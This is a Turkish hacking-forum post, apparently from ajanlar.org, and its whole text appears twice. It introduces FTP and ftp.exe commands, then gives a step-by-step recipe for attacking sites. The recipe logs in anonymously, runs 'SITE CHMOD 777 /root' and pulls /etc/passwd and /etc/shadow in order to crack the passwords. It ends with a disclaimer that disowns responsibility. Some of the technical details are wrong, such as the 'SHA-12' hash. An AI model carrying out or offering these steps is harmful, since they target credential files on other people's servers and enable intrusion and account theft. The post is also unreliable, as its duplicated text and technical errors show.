Selamlar sayın ajanlar.org üyeleri!
Eğer yasadışı panel paylaşımlarından vazgeçip buraya bişeyler öğrenmeye gelmişsen ne mutlu sana... ve ayrıca sana bişey öğretebilirsem ne mutlu bana...
Bu konu biraz teknik bilgiler içerir , bu konuyu da sizle paylaşmaktan mutluluk duyarım...
Konu düzeni:
1. Bölüm : FTP Nedir?
2. Bölüm : Temel FTP Komutları
3. Bölüm : FTP Sitenin DATA'sını çekme
1. Bölüm , FTP NEDIR?
ftp , 1970'li yıllarda ortaya çıkmıştır. ftp'nin açılımı File Transfer Protocol'dür ve ftp port 21 üzerinden çalışır.
ftp , adından da anlaşılacağı gibi asıl amacı dosya transferi yapmaktır.
ftp , dosya transferlerini şifresiz yapmaktadır , pek güvenli değildir o yüzden sftp vs. de çıkmıştır, ama biz ftp'ye bakacağız sftp / ssh vs. değil.
Bunun için (ftp için) geliştirilmiş programlar da vardır , filezilla - blazeftp gibi.
Ama filezilla veya blazeftp gibi dış programlara gerek yok çünkü ftp kullanmak için bir cmd aracı da var , ftp.exe , windows'ta yerleşik olarak gelen bir program/Komuttur.
2. Bölüm , FTP Komutları
ftp komutları da aslında cmd komutlarına benzer ama sadece biraz daha farklıdır.
dir : Dosyaları listelemek için kullanılır ,
ls : Bu da dosyaları listelemk için kullanılır ama ben dir daha çok kullanırım.
rename : Bir dosyayı yeniden adlandırmak için kullanılır.
del : Bu komut dosya silmek için kullanılır.
cd : dizin değiştirmek için kullanılır mesela cd /pub gibi.
pwd : Şu an hangi dizinde olduğunuzu gösterir.
get : Siteden dosya Çekmek için Kullanılır.
put : Siteye dosya atmak için kullanılır.
quote : Ham terminal Komutlarıdır , quote "çalışıracağınız linux komutu" şeklinde kullanılır.
3. Bölüm , Site Data'sı Çekme
Bu yöntem çok eskidir günümüzde belki çok az sitede çalışır ama yine de denemeye değer.
İlk olarak cmd.exe açıyoruz ve sonrasında sırasıyla şu komutları çalıştırıyoruz:
ftp site.com , bu komut sitenin ftp (file transfer protocol) adresine girmemizi sağlar.
İlk olarak bize isim ve şifre soracak enter'a basıp boş geçiyoruz , ardından:
quote user ftp komutunu çalıştırıyoruz. Sonra da quote pass ftp diyoruz, böylece anonim girişimizi yaptık.
Ardından ise:
quote SITE CHMOD 777 /root , bu komut da root dizininin tüm izinlerini açar ,
daha sonra da:
quote cwd ~root , komutunu çalıştırıyoruz ve sonra da şu 2 komutu çalıştırıp database'i çalmış oluyoruz:
1. komut : get /etc/passwd
2. komut: get /etc/shadow
ve sonra da bu passwd ve shadow dosyalarının içeriğini şifrelenmiş halde bulmuş oluyoruz (SHA-12 veya MD5 gibi) ,
artık şifreleri gayet rahatlıkla kırabiliriz , iyi günler...
UYARI: Bu yöntem çoğu sitede çalışmaz , açıklı sitede uygulamak gereklidir , bu açık şu an pek çok sitede yamalandı o yüzden ftp site.com desek bile eğer cmd donarsa sitenin ftp adresi yoktur yani bişey yapamayız veya o quote yazan komutlarda Access Denied (erişim engellendi) gibi bişey yazıyorsa yine başaramamışız demektir , ama eğer bağlanmış da
hem de Access Denied mesajı almadan dosyaları çekebilmişsek işte o zaman database'i (veritabanı) almışız demektir....
Bir de şunu söyleyeyim: TURK SITESI HACKLEMEK YASAK...
Ayrıca yapılan hiç bir yasadışı eylemden sorumlu değilim...
İyi Günler , Sağlıcakla kalın.
KARABEY
Eğer yasadışı panel paylaşımlarından vazgeçip buraya bişeyler öğrenmeye gelmişsen ne mutlu sana... ve ayrıca sana bişey öğretebilirsem ne mutlu bana...
Bu konu biraz teknik bilgiler içerir , bu konuyu da sizle paylaşmaktan mutluluk duyarım...
Konu düzeni:
1. Bölüm : FTP Nedir?
2. Bölüm : Temel FTP Komutları
3. Bölüm : FTP Sitenin DATA'sını çekme
1. Bölüm , FTP NEDIR?
ftp , 1970'li yıllarda ortaya çıkmıştır. ftp'nin açılımı File Transfer Protocol'dür ve ftp port 21 üzerinden çalışır.
ftp , adından da anlaşılacağı gibi asıl amacı dosya transferi yapmaktır.
ftp , dosya transferlerini şifresiz yapmaktadır , pek güvenli değildir o yüzden sftp vs. de çıkmıştır, ama biz ftp'ye bakacağız sftp / ssh vs. değil.
Bunun için (ftp için) geliştirilmiş programlar da vardır , filezilla - blazeftp gibi.
Ama filezilla veya blazeftp gibi dış programlara gerek yok çünkü ftp kullanmak için bir cmd aracı da var , ftp.exe , windows'ta yerleşik olarak gelen bir program/Komuttur.
2. Bölüm , FTP Komutları
ftp komutları da aslında cmd komutlarına benzer ama sadece biraz daha farklıdır.
dir : Dosyaları listelemek için kullanılır ,
ls : Bu da dosyaları listelemk için kullanılır ama ben dir daha çok kullanırım.
rename : Bir dosyayı yeniden adlandırmak için kullanılır.
del : Bu komut dosya silmek için kullanılır.
cd : dizin değiştirmek için kullanılır mesela cd /pub gibi.
pwd : Şu an hangi dizinde olduğunuzu gösterir.
get : Siteden dosya Çekmek için Kullanılır.
put : Siteye dosya atmak için kullanılır.
quote : Ham terminal Komutlarıdır , quote "çalışıracağınız linux komutu" şeklinde kullanılır.
3. Bölüm , Site Data'sı Çekme
Bu yöntem çok eskidir günümüzde belki çok az sitede çalışır ama yine de denemeye değer.
İlk olarak cmd.exe açıyoruz ve sonrasında sırasıyla şu komutları çalıştırıyoruz:
ftp site.com , bu komut sitenin ftp (file transfer protocol) adresine girmemizi sağlar.
İlk olarak bize isim ve şifre soracak enter'a basıp boş geçiyoruz , ardından:
quote user ftp komutunu çalıştırıyoruz. Sonra da quote pass ftp diyoruz, böylece anonim girişimizi yaptık.
Ardından ise:
quote SITE CHMOD 777 /root , bu komut da root dizininin tüm izinlerini açar ,
daha sonra da:
quote cwd ~root , komutunu çalıştırıyoruz ve sonra da şu 2 komutu çalıştırıp database'i çalmış oluyoruz:
1. komut : get /etc/passwd
2. komut: get /etc/shadow
ve sonra da bu passwd ve shadow dosyalarının içeriğini şifrelenmiş halde bulmuş oluyoruz (SHA-12 veya MD5 gibi) ,
artık şifreleri gayet rahatlıkla kırabiliriz , iyi günler...
UYARI: Bu yöntem çoğu sitede çalışmaz , açıklı sitede uygulamak gereklidir , bu açık şu an pek çok sitede yamalandı o yüzden ftp site.com desek bile eğer cmd donarsa sitenin ftp adresi yoktur yani bişey yapamayız veya o quote yazan komutlarda Access Denied (erişim engellendi) gibi bişey yazıyorsa yine başaramamışız demektir , ama eğer bağlanmış da
hem de Access Denied mesajı almadan dosyaları çekebilmişsek işte o zaman database'i (veritabanı) almışız demektir....
Bir de şunu söyleyeyim: TURK SITESI HACKLEMEK YASAK...
Ayrıca yapılan hiç bir yasadışı eylemden sorumlu değilim...
İyi Günler , Sağlıcakla kalın.
KARABEY